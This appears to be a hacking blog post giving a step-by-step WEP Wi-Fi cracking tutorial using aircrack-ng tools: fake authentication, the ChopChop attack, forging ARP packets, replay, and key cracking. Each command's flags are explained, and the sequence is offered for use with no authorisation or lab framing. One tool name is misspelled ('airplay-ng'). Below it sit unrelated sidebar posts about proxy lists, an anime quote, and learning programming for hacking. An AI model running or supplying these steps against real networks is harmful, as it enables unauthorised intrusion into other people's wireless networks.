Skip to main content

Advanced WEP Hacking

The Mighty ChopChop / Korek attack!


Things You must know:
1.Kali Linux or its tools installed in any Linux(Ubuntu,Debain)
2.Basic knowledge of using Kali Linux.
Let's Start


airmon-ng start wlan0 6
Starts mon0 on channel 6

airodump-ng -c 6 mon0
In this case we know that the AP is using channel 6 .. so we´re listening on channel 6

Press CTRL+C and copy AP bssid
We need our MAC-address...

macchanger -s mon0
Copy that.. This MAC you will need a couple of times


Buy Best Hacking Gadgets Here ---Buy Now

aireplay-ng -1 0 -e Test -a 00:09:5B:D9:FD:94 -h f8:d1:11:08:dc:cb mon0
-1 = Fake authentication
0 = Reassociation timing in seconds
-e = Target network essid
-a = acces point MAC address
-h = your card MAC adress

aireplay-ng -4 -e Test -b 00:09:5B:D9:FD:94 -h f8:d1:11:08:dc:cb mon0
-4 = ChopChop attack
-e = Target network essid
-h = MAC adress of associated client or from fake auth
-b Acces point MAC adress 

You will be asked if you want to use "this" package. OBSERVE Dest.MAC 

Dest.MAC should NOT say ff:ff:ff:ff:ff:ff (this time)

When you found the right packet, press y


[Image: wep2.jpg]

all information are saved in 2 replay files (replay_dec-1116-190213.xor and replay_dec-1116-190213.cap)

packetforge-ng -0 -a 00:09:5B:D9:FD:94 -h f8:d1:11:08:dc:cb -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1116-190213.xor -w arp-request
-0 We want arp request packet generated
-a Access Point MAC address
-h Source MAC address, your MAC
-k set Destination IP
-l set Source IP
-y read PRGA from this file
-w write packet to this pcap file

Wrote packet to arp-request (file saved as arp-request)
Time to start Airodump

airodump-ng -w wifi -c 6 --bssid 00:09:5B:D9:FD:94 mon0
-w = Write to file called wifi 
-c = Channel
--bssid = (MAC address of AP)

airplay-ng -2 -r arp-request mon0
-2 = Interactive packet replay
-r = used to specify a pcap file to read packets from

You will be asked if you want to use "this" package. Push "Y"

TIME TO CRACK IT
aircrack-ng wifi-01.cap

[Image: wep3.jpg]


Done it!!!

Comments

Popular posts from this blog

PROXIES LIST 9/26/2016 HIGH QUALITY

TOTAL NO. OF PROXIES:1629

Hachiman's Quote- "I Hate nice Girls!"

" I hate nice girls . Just exchanging pleasantries with them makes me curious,and texting each other makes me feel restless. If I get a call, for the rest of the day, I’ll keep checking my call history with a stupid grin on my face. But I know the truth. They’re just being nice . Anyone nice to me is nice to others too. But I always find myself on the verge of forgetting that. If the truth is a cruel mistress, then a lie must be a nice girl . And so, niceness is a lie. I would always hold expectation. I would always misunderstand. At some point, I stopped hoping. An experienced loner never falls for the same trap twice. A lone warrior, surviving hundreds of battles. When it comes to losing, I’m the strongest. That’s why, no matter what happens, I will always hate nice girls. "

Which Programming Language To Learn For Hacking?

Having the prior knowledge of programming is something which will separate you from all the other script kiddes( Wanna be hackers ) and other tool lovers out there, Lots of times during penetration tests you come across a point where you need to write or build your own custom scripts and programs this is where the knowledge of programming comes handy.  Buy Best Hacking Gadgets Here --- Buy Now! The other and by the far the most important advantage of programming is that you will be able to understand exploit codes and even learn to write them too, Though there are softwares which have made the process of exploit writing much simpler, but you still need to have a solid grasp of programming languages in order to know how the exploits work.